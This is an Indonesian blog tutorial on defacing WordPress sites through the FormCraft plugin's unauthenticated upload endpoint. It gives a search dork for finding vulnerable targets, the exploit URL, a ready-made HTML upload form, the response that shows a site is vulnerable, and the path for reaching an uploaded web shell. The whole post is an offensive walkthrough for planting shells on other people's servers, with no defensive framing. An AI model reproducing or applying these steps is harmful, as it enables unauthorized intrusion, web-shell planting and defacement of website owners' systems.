Tutorial Deface Dengan Wordpress Plugin FormCraft

Yah wordpress memang cms dengan sejuta bug di plugin nya, Kalo mempunyai web dengan cms wordpress harus hati-hati jika instal-instal plugin dan selalu di perbarui.

Langsung saja, kali ini saya akan membagikan tutorial deface dengan wordpress plugin formcraft.
Bahan-bahan
1. Shell ( bisa download disini )
2. CSRF

Script CSRF

 <form method="POST" action="http://site/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form> 

1. Cari target dengan DORK 
inurl:/wp-content/plugins/formcraft
( kembangin lagi sendiri )
2. Buka site lalu tambahkan exploit /wp-content/plugins/formcraft/file-upload/server/php/upload.php
Contoh:
http://site.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php
3. Jika vuln akan tampak teks ("failed":"no file found 2")

4. Copy script CSRF di atas, Pastekan di notepad ganti http://site.com dengan site target kalian.
simpan dengan format .html, save as tipe "all file"
contoh : tamvan.html

5. Lalu buka file CSRF yang kalian simpan tadi, lalu upload shell kalian.
6. Jika sukses kalian akan mendapatkan nama shell kalain dengan teks random
contoh: 19860ab123abcd---blabla.php
7. Access shell kalian di http://www.site.com/wp-content/plugins/formcraft/file-upload/server/php/files/nameshellrandom.php



Sekian tutorialnya, wasalam ^_^

Jika anda ingin mengirimkan saran, pendapat, masukan, dll kepada saya maka anda dapat menulisnya di kotak form disini

Bagikan bos:

• facebook
• twitter
• google+
• tumblr
• linkedin
• pinterest
• Whatsapp
• line
• blackberry